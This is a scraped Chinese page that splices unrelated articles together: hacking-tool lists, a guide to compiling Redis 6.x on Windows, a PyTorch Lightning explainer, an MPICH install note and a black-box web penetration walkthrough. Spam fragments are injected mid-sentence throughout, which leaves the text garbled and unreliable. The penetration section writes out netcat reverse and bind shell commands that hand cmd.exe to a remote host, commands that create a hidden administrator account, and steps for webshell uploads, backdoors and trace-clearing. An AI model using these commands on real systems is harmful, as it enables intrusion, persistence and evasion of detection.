1.如何入门黑客工具箱Kali?码分 - 知乎
2.编译实战 | 手摸手教你在Windows环境下运行Redis6.x
3.web渗透是什么?
4.最佳的75个网络安全工具
5.Nuplan源码中Pytorch Lightning详解
6.黑客工具软件大全100套
如何入门黑客工具箱Kali? - 知乎
QingScan支持的黑客工具箱Kali清单: 1. Xray:一款功能强大的安全评估工具,具备多款一线安全从业者的码分精心设计与优化。 2. Awvs:全称为Acunetix Web Vulnerability Scanner,码分专用于扫描web应用程序上的码分安全问题,如SQL注入、码分XSS、码分熟悉源码要多久目录遍历等。码分 3. Rad:一款专为安全扫描而设计的码分浏览器爬虫。 4. Masscan:进行快速端口扫描的码分工具,适用于大型网络的码分扫描。 5. Nmap:Gordon Lyon开发的码分网络扫描工具,能识别网络上的码分主机和服务,具备强大的码分网络枚举和测试功能。 6. Fortify:HP的码分产品,用于静态、码分白盒的软件源代码安全测试,能识别代码中的安全漏洞。 7. Kunlun-M:支持PHP、JavaScript等语义分析,以及Chrome扩展、Solidity的基础扫描。 8. Semgrep:快速、开源的静态分析工具,用于检测代码错误和执行代码标准。 9. Pocsuite:知道创宇实验室研发的远程漏洞测试框架,支持漏洞验证、开发PoC/Exp和集成至其他工具。 . Whatweb:自动识别CMS、BLOG等Web系统,用于web指纹识别。 . Oneforall:子域名信息收集的工具,功能强大。 . Hydra:爆破工具,支持多种服务的账号和密码破解。 . Sqlmap:检测和利用SQL注入漏洞的工具,具备自动化处理功能。 . Dirmap:高级web目录、文件扫描工具,功能超越了DirBuster、Dirsearch等。 . 河马Webshell检测:专注于webshell查杀,采用双引擎技术,查杀速度快、精度高。 . Wafwfscan:自动识别WAF的工具。 . Nuclei:基于模块进行请求发送的网络侦查工具,具备在被WAF后自动重传的功能。 . Vulmap:对web应用进行漏洞扫描和验证的工具,支持多种web应用的漏洞扫描。 . Crawergo:使用chrome headless模式进行URL收集的浏览器爬虫,能收集网站入口。 . Dismap:快速识别Web指纹信息,辅助定位资产。 -. PHP、Java、怎样源码建站Python依赖检测:自研工具,用于白盒审计时读取项目依赖。 . GitHub安全公告:自研工具,获取GitHub的安全公告。 . GitHub关键字检测:通过搜索GitHub自动找出源码泄露。 . 免费代理获取:自研工具,自动搜索HTTP代理。 . gitee热门项目获取:自动获取热门项目,用于代码审计。 . 数据库备份:自动备份数据库。 . updateRegion:自动更新IP所属地域信息。 如需加入交流群,可点击阅读原文,自动跳转到QingScan工具介绍页扫码入群。编译实战 | 手摸手教你在Windows环境下运行Redis6.x
哈喽大家好啊,我是没事就愿意瞎捣鼓的Hydra。
不知道有没有小伙伴像我一样,平常开发中用的是windows操作系统,有时候想装点什么软件,一看只支持linux系统,无奈要么启动虚拟机、要么装在云服务器上。
这不前几天又是这样,刚想用一下Redis 6.x版本来尝试一下新特性,打开官网一看,好家伙我直呼内行,果然不支持windows系统:
不过虽然redis的官网上不提供windows版本下载,但是这也难不倒我这个面向百度编程的小能手,一番查找后让我找到了微软在github上维护的几个可以在windows上运行的redis版本:
项目的git地址是/MicrosoftArchive/redis/releases,我翻了一下,微软维护了2.x和3.x的多个windows版本redis,不过比较遗憾,在维护到3.0.正式版本后就放弃了更新。
不过问题不大,眼看微软撂挑子不干了,波兰的热心市民 Tomasz Poradowski 先生这时候站出来,继续开始提供可以在windows上运行的4.x和5.x版本的redis,并且从年到年一干就是5年。
项目git地址是/tporadowski/redis/releases,没错,其实我本地环境运行的redis-5.0.9就是以前从这里下载的,而且绿色版使用起来真的是干净又卫生,所以我强烈建议大家给这位老哥来一个Star支持一下。
不过绕了这么一大圈,我的问题还是没有解决啊,既然没有现成的可以在windows上运行的redis6.x版本,那我们干脆就来自己编译一个吧。
首先介绍一下我们今天要用到的工具Cygwin,先简单看一下它的官网 /,上面很清晰的解释了几个容易引起大家混淆的问题:
先解释了cygwin是什么:
再纠正了大家的常见误区:
其实可以用一句话来概括一下它的功能,cygwin是一个可运行于原生windows系统上的POSIX兼容环境,可以通过重新编译将linux应用移植到windows中。
好了,这样简单了解一下cygwin的广告币源码功能对我们来说暂时就足够了,下面我们看看如何使用它来编译windows版本redis。
下面我们先进行编译工具Cygwin的下载和安装,在它的官网上就可以直接下载,完成后就可以开始安装了。下面我会贴出一些需要特殊配置的步骤,如果没有特殊说明的话,那么直接痛快的点击下一步就可以了。
网络连接配置这里选择第二项,也就是直接连接,不需要任何代理方式:
在选择下载源这一步,先手动输入User URL,添加阿里云的镜像/cygwin,点击add后再选择我们刚才添加的这个源,然后点击下一步:
接下来选择需要下载安装的组件包,我们只需要下载我们编译相关的模块即可。先通过上面的搜索框进行定位,选择安装Devel模块下面的make、gcc-core,gcc-g++,以及Libs模块下的libgcc1 、libgccpp1,然后点击New这一列的Skip,选择要安装的版本号,全部添加完成后点击下一步:
接下来会自动进行下载上面选择的模块,等待全部下载结束后安装就完成了:
安装完成后,我们运行Cygwin Terminal,通过命令检测可以看到Status为OK,表示cygwin运行正常:
准备好编译工具后,我们接下来先下载redis6.x版本的源码,6.0.的下载地址为:
download.redis.io/relea...
cygwin安装完成后,会在它的安装路径的home目录下,创建一个以你登录系统的用户名来命名的目录,我们把下载完成后的压缩包放到这个cygwin\home\${ user}目录下,在cygwin命令行中先执行解压命令:
使用下面的命令先切换到解压后的根目录,然后执行编译和安装:
点击回车,然后就开始漫长的等待吧,不得不说编译和安装的过程真的很慢,我这大概花了分钟才全部完成。
不出意外的最后果然出现了意外,报了两个Error,不过貌似没有什么太大影响,切换到src目录下,就已经可以看到编译完成后已经生成了6个exe可执行文件了:
但是如果这个时候双击redis-server.exe尝试进行启动的话,那么就会报错提示缺少dll动态链接库:
我们可以在cygwin的bin目录下找到这个文件,为了方便,把可执行文件、动态链接库文件、redis配置文件拷贝到一个单独的目录下再次尝试启动:
这次能够正常启动成功,我们再使用客户端连接工具连接并进行测试,终于,6.0.版本的redis可以在windows环境下正常运行了。
忙活一大顿总算成功了,我们也终于可以在windows上体验redis6.x版本了,不过这里还是l商城源码给小伙伴们提个醒,这样编译的redis我们平常自己在学习中体验一下就可以了,尽量不要用在生产上。
因为cygwin编译后的程序,相当于在windows系统上模拟实现了POSIX兼容层,应用程序在底层多了一层函数调用,因此效率比运行在linux系统的原生应用低了很多。因此,这样在windows上运行的redis,无疑会损失掉它引以为傲的高性能这一优势。
秉持着好东西就要分享的原则,我也已经把编译好的windows版redis6.0.上传到了网盘,有需要的小伙伴们可以从下面获取下载方式。
那么,这次的分享就到这里,我是Hydra,下期见。
作者简介,码农参上,一个热爱分享的公众号,有趣、深入、直接,与你聊聊技术。个人微信DrHydra9,欢迎添加好友,进一步交流。
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,小数源码相加再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
最佳的个网络安全工具
在这个纷繁复杂的网络世界中,为了保护你的系统和数据安全,拥有一套强大而可靠的网络安全工具显得尤为重要。以下是一些最佳的个网络安全工具,它们涵盖了风险评估、协议检测、入侵防护,以及网络审计等多个方面,确保你的网络防线坚固如铁。
**1. Nessus** - 作为开源的风险评估工具,Nessus在Linux/BSD/Unix平台上支持远程安全扫描,能够生成详尽的报告并提供改进建议,是安全检查的得力助手。
**2. Tenable** - 这家公司专注于网络安全暴露管理,提供全面的解决方案,帮助企业实时监控网络安全状况。
**3. Ethereal** - 这款网络协议检测工具,开源且跨Unix/Windows平台,交互式数据包分析能力强大,对网络通信有深入洞察。
**4. Snort** - 作为入侵检测系统,Snort以开源著称,能对IP网络进行深入分析和协议/内容检测,防止潜在威胁。
**5. Netcat** - 作为基础的网络工具,Netcat支持TCP/UDP连接,是网络调试和探测的必备工具。
**6. TCPDump/WinDump** - 作为网络监测和数据收集工具,它们在命令行中表现出色,跨平台适应力强。
**7. Hping2** - 这个网络探测工具支持多种协议包发送,还具备traceroute功能,让你轻松测试网络连接。
**8. DSniff** - 用于网络审计和渗透测试,能够监视和分析网络数据,提供深入的网络安全洞察。
**9. SSHmitm, webmitm** - 以及商业工具如GFI LANguard、Ettercap和Whisker/Libwhisker,它们在数据交换和MITM攻击防范中扮演重要角色。
**. SSH, OpenSSH** - 开源和商业的SSH/SSH协议保证了远程登录的安全,而Sam Spade和ISS Internet Scanner则在应用层风险评估中提供支持。
**. Tripwire** - 这个开源工具提供数据完整性监控,商业版本则在Linux上更胜一筹,是Nessus的替代品。
**. Linux/BSD/Unix/Windows平台** - 你的选择范围广泛,适应不同操作系统。
**. Nikto** - 开源的web安全扫描工具,有助于检测潜在的漏洞。
**. Kismet** - 无线嗅探工具,针对Wi-Fi和蓝牙设备,商业版本功能更全面。
**. SuperScan** - 作为Windows上的免费端口扫描器,McAfee提供强大的防护。
**. L0phtCrack** - 这款口令审计工具在破解口令方面独具优势。
**. Retina** - 商业风险评估工具BeyondTrust,提供深度的安全评估。
**. Netfilter** - Linux内核防火墙iptables,状态检测和NAT功能强大。
**. traceroute/ping/telnet/whois** - 基础命令,跨平台且实用。
**. Fport** - Windows上的增强netstat,专为Windows设计。
**. SAINT** - 商业风险评估工具,曾开源,适用于UNIX类平台。
**. Network Stumbler** - 无线接入点搜索工具,Windows版本,Kismet在UNIX上更受欢迎。
**. SARA** - SATAN的衍生工具,开源,支持Linux/BSD/Unix。
**. N-Stealth** - 商业Web扫描工具,Windows专属,源代码不公开。
**. AirSnort** - 无线WEP密码破解工具,多平台可用。
**. NBTScan** - 收集Windows网络信息的工具,开源,跨平台。
**. GnuPG/PGP** - 加密库,开源/商业,适用于所有主要平台。
**. OpenSSL** - 用于SSL/TLS加密的开源库,广泛支持。
**. NTop** - 显示网络流量的开源工具,适合监控网络使用情况。
**. Nemesis** - 命令行工具,用于测试网络设备,Linux专用。
**. LSOF** - Unix的诊断工具,列出系统打开的文件,开源。
**. Hunt** - Linux上的高级包嗅探工具,用于会话劫持。
**. Honeyd** - 个人 honeynet 实验平台,提供虚拟主机模拟,开源。
**. Achilles** - 代理服务器测试工具,开源,Windows可用。
**. Brutus** - 网络认证破解工具,字典攻击支持,免费下载(Windows)。
**. Stunnel** - 多用途SSL加密外壳,开源,跨平台。
**. Paketto Keiretsu** - TCP/IP工具集合,开源,功能丰富。
**. Fragroute** - 损坏IDS工具,开源,支持多种平台。
**. SPIKE Proxy** - 用于web安全检测的开源HTTP代理。
**. THC-Hydra** - 网络认证破解工具,开源,适合多种平台。
**. Nessus功能的补充** - 包括OpenBSD、TCP Wrappers、pwdump3等工具,涵盖了更多安全细节。
通过这些工具,你可以全面地保护你的网络环境,确保安全无虞。每个工具都有其独特的优势,可根据你的具体需求来选择和部署。记住,安全永远是网络世界中的首要任务。
Nuplan源码中Pytorch Lightning详解
Nuplan源码解读系列中,我们已对Hydra进行了详尽解析。Pytorch Lightning,针对大型工程设计,模块独立,提供模板,简化开发。其应用主要分为四部分:数据加载、模型构建、模型使用、回调函数。在Nuplan中,数据加载与模型训练通过run_training.py执行,模型评估与可视化则在run_simulation.py和run_nuborad.py中进行。Pytorch Lightning提供了简洁实例教程,帮助快速上手。
数据加载方面,Nuplan数据集通过自定义Dataset继承torch.utils.data.Dataset进行加载。数据预处理在compute_features函数中执行,提取map和agent的特征与目标信息。Trainer.fit()启动训练,每个batchsize自动调用getitem函数,执行数据提取。
在数据管理上,LightningDataModule用于数据集划分,Nuplan使用setup、teardown、train_dataloader、val_dataloader、test_dataloader等函数。setup函数调用create_dataset划分数据集,随机选取样本作为训练集。
模型准备阶段,通过LightningModule加载模型,关键方法包括training_step、validation_step、test_step与configure_optimizers。这些函数用于不同阶段的训练、验证、测试与设置优化器。详细流程包括数据准备、自动调用训练函数,以及在training_step中执行整个训练流程,包含特征与目标提取、前向传播、损失计算与指标评估。
后续,我们计划继续探讨Pytorch Lightning的高级应用,以及在Nuplan项目中如何高效集成与优化。请注意,这里提供的代码示例基于在Pytorch Lightning框架上开发的plantf,而非Nuplan的原始代码,但主体框架与之相似,仅在模型内容上有所差异。期待进一步的分享与交流。
黑客工具软件大全套
一、网络探测与安全扫描
1. Nessus
作为一款漏洞扫描软件,Nessus拥有超过个插件,能够为远程和本地系统提供全面的安全检测。其GTK界面和自定义插件功能使得操作更加便捷。尽管Nessus 3的免费版本源代码被封禁,购买新插件成为了其一大亮点。
2. Wireshark
作为开源的网络协议分析器,Wireshark能够实时捕获网络数据,支持多种协议和媒体类型。其显示过滤器语言和命令行版本同样强大,但需注意定期进行安全更新。
3. Snort
Snort是一款开源的入侵检测系统,擅长于协议分析和检测可疑行为。其基础的BASE引擎分析简单易用。
4. Netcat
Netcat是一个灵活的网络工具,不仅能进行TCP/UDP数据的读写,还能扩展为多功能调试工具,如Socat和Ncat。
二、密码破解与恢复
5. Cain & Abel
Cain & Abel是一款针对Windows系统的密码嗅探器,其密码破解功能强大,相关文档也非常详尽。
6. John the Ripper
John the Ripper是一款跨平台的密码破解工具,支持多种加密类型,能够有效保护你的密码安全。
三、网络安全防护与防护工具
7. Ettercap
Ettercap是一款交换式局域网的嗅探专家,能够进行实时过滤,保护网络安全。
8. Nikto
Nikto是一款全面的网页扫描器,能够揭示隐藏的漏洞隐患。
四、基础通信工具与远程访问
9. OpenSSH与PuTTY
OpenSSH与PuTTY分别为远程服务器访问提供安全通道。SSH以其易用性和广泛支持而著称,而PuTTY在Windows系统上尤为流行。
. ThC Hydra
ThC Hydra是一款快速的网络认证破解工具,展现其强大的攻击力量。
. Paros proxy
Paros proxy是一款网页漏洞评估代理,支持SQL注入等高级攻击,帮助你洞悉网络风险。
五、网络深入探索与管理
. Netfilter
Netfilter是Linux内核的网络数据包过滤器,拥有丰富的第三方扩展,如FTP功能的增强。
. Sysinternals的工具集
Sysinternals提供的工具集,如ProcessExplorer和PsTools,为Windows系统管理提供实用解决方案。
. Retina
Retina是一款由eEye开发的商业漏洞扫描器,与Nessus齐名,能够提供深入的系统安全评估。
. 脚本语言
通过Perl、Python和Ruby等脚本语言,如Net::RawIP,能够解决特定的网络安全挑战。
六、经典与专业工具
. 基础命令
从基础命令如ping、telnet到高级工具如L0phtcrack(需注册码),这些工具构成了网络安全的完整链条。
. 网络安全管理
如GnuPG/PGP等开源PGP应用,以及专业的Core Impact等工具,都在各自领域发挥着关键作用。
网络安全是一个持续学习和更新的领域,确保你总是掌握最新、最有效的工具箱。
Ubuntu.下安装mpich2(HYDRA3.3a2)
Ubuntu.下安装mpich2,直接使用命令sudo apt install mpich即可简单完成。对于源码编译,未来有机会再深入探讨。安装mpich的目的是为了支持国产开源CFD软件OneFLOW所需的并行计算能力,确保跨平台环境搭建。
安装完毕后,通过mpicxx --version查看版本信息,发现自动调用的是g++9.2.1,其他版本类似也进行了相应测试。
mpirun命令提供更多信息,显示出版本为hydra3.3a2,表明是较新版本。尝试直接下载源码编译,结果与通过apt安装的版本相近。
使用源码示例程序运行时,遇到了找不到文件的困扰,影响了测试心情。对比c代码,发现无明显问题,暗示环境配置大致正确。
测试并行运行功能,使用mpirun -n 4 ./cpi命令,发现可以成功并行,输出结果稍显杂乱。深入研究cxxpi.cxx文件,发现定义了预定义宏,导致简单代码编译失败。
通过调整mpicxx命令,增加预定义宏DHAVE_CXX_IOSTREAM和DHAVE_NAMESPACE_STD,成功解决了c++部分的问题。最终,运行mpirun -n 8 ./cxxpi确保了复杂环境的通过。
Ubuntu.与gcc9.2.1下的mpich2环境安装成功,对于有兴趣的读者,可以借鉴这些经验应用到更为复杂的项目中。